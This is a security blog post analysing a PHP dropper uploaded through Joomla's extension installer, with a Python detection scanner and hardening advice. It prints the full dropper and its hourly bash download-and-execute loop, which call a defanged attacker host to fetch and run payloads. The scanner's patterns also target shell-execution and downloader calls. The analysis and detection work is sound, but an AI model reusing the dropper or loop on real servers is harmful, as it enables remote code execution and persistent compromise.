Again we found new malware that uses the PHP shell_exec() function to download and execute more malware on the server.
POST Payload
This looks like abuse of the Joomla extension installer (administrator/index.php?option=com_installer) to upload a file. In a default installation that page is only reachable with an administrator login, so weak or stolen admin credentials are a likely precursor of this upload:
--2a2ea832-B-- POST /administrator/index.php?option=com_installer&videw=install HTTP/1.0
The payload uploads a file named proc.php to the server and executes it:
proc.php
--2a2ea832-C-- Wordpress
<?php
shell_exec("pkill bash 2>&1");
shell_exec("pkill sh 2>&1");
shell_exec("wget hxxp://recaptcha-in.pw/bash/p.sh 2>&1");
shell_exec("nohup bash ./p.sh & 2>&1");
shell_exec("rm p.sh 2>&1");
unlink(__FILE__);
?>
p.sh
proc.php first kills any running bash and sh processes, then downloads the p.sh bash script and starts it in the background with nohup. Once p.sh is running it removes p.sh from disk and finally deletes itself with unlink(__FILE__) to hide the infection. Deleting p.sh does not stop it: the bash process already has the script open and keeps running, so the loop below survives as a process only, not as a file:
while :; do
  wget -c hxxp://recaptcha-in.pw/bash/xtaccess -O p.php &> /dev/null
  chmod 777 p.php &> /dev/null
  php ${PWD}/p.php &> /dev/null
  wget -c hxxp://recaptcha-in.pw/bash/head -O h.php &> /dev/null
  chmod 777 h.php &> /dev/null
  php ${PWD}/h.php &> /dev/null
  sleep 3600
done
Every hour it downloads two more malware files, saved as p.php and h.php, makes them world-writable and executable (chmod 777) and runs them with the PHP command-line interpreter. These files then infect more PHP files on the server. Because the loop runs in memory after p.sh was deleted, the indicators to look for are the long-running bash process, the hourly outbound requests to recaptcha-in.pw and the dropped p.php/h.php files.
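As an added example (my own code, not code from the original post and not the Malware Expert signatures), here is a small Python scanner that flags PHP files combining the indicators seen in proc.php above: a shell-execution call, a downloader invocation with a URL, killing of existing shells, nohup backgrounding and self-deletion via unlink(__FILE__). The indicator weights, the threshold, the sample files and the defanged example.invalid URL are all constructed for this demo and are assumptions, not signatures from any product.

```python
"""Score PHP files for the dropper pattern seen in proc.php (added example)."""
import os
import re
import tempfile

# Indicators taken from the proc.php dropper quoted above. Weights are my own
# choice (assumption): a lone exec-family call in an admin script is common and
# scores low; exec + download + self-delete together is the dropper signature.
INDICATORS = [
    ("exec_call", re.compile(r"\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\(", re.I), 2),
    ("downloader", re.compile(r"\b(wget|curl)\b[^;|&\n]*(https?|hxxps?|ftp)://", re.I), 2),
    ("self_delete", re.compile(r"unlink\s*\(\s*__FILE__\s*\)", re.I), 3),
    ("kill_shells", re.compile(r"\bpkill\s+(bash|sh)\b"), 1),
    ("background", re.compile(r"\bnohup\b"), 1),
]
THRESHOLD = 5  # exec + downloader + self-delete = 7; a lone exec() call = 2


def score_source(src):
    """Return (score, [indicator names]) for one PHP source string."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def scan_tree(root, threshold=THRESHOLD):
    """Walk root, score every *.php file, return {relpath: (score, hits)} for files at or above threshold."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    score, hits = score_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if score >= threshold:
                flagged[os.path.relpath(path, root)] = (score, hits)
    return flagged


# Constructed samples: a copy of the dropper with a defanged URL, a benign
# page, a legitimate admin script that calls exec() once, and a non-PHP file
# that must be ignored even though it contains the indicators.
SAMPLES = {
    "tmp/proc.php": '<?php shell_exec("pkill bash 2>&1"); shell_exec("pkill sh 2>&1"); '
                    'shell_exec("wget hxxp://example.invalid/bash/p.sh 2>&1"); '
                    'shell_exec("nohup bash ./p.sh & 2>&1"); shell_exec("rm p.sh 2>&1"); '
                    'unlink(__FILE__); ?>',
    "index.php": '<?php echo "Hello"; ?>',
    "admin/backup.php": '<?php exec("tar czf backup.tgz /var/www/html", $out); ?>',
    "notes.txt": 'shell_exec("wget http://example.invalid/x"); unlink(__FILE__);',
}


def demo():
    """Write the constructed samples into a temp dir, scan it and return the flagged files."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, (score, hits) in demo().items():
        print(f"{path}: score={score} hits={','.join(hits)}")
```

Run it against a document root with scan_tree("/var/www/html"). Only tmp/proc.php is reported in the demo: the backup script scores 2 for its single exec() call and stays below the threshold, which is the point of scoring combinations instead of alerting on every shell_exec.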
Final words
If shell_exec is listed in the PHP disable_functions setting, this dropper fails harmlessly; if it is not, the commands run with the privileges of the web server user. Since the attacker can switch to another function, disable exec, system, passthru, popen and proc_open together with shell_exec unless a site really needs them.
Websites using Malware Expert – ModSecurity rules are protected against this attack.
Use Malware Expert – Signatures to detect this malware in files for FREE!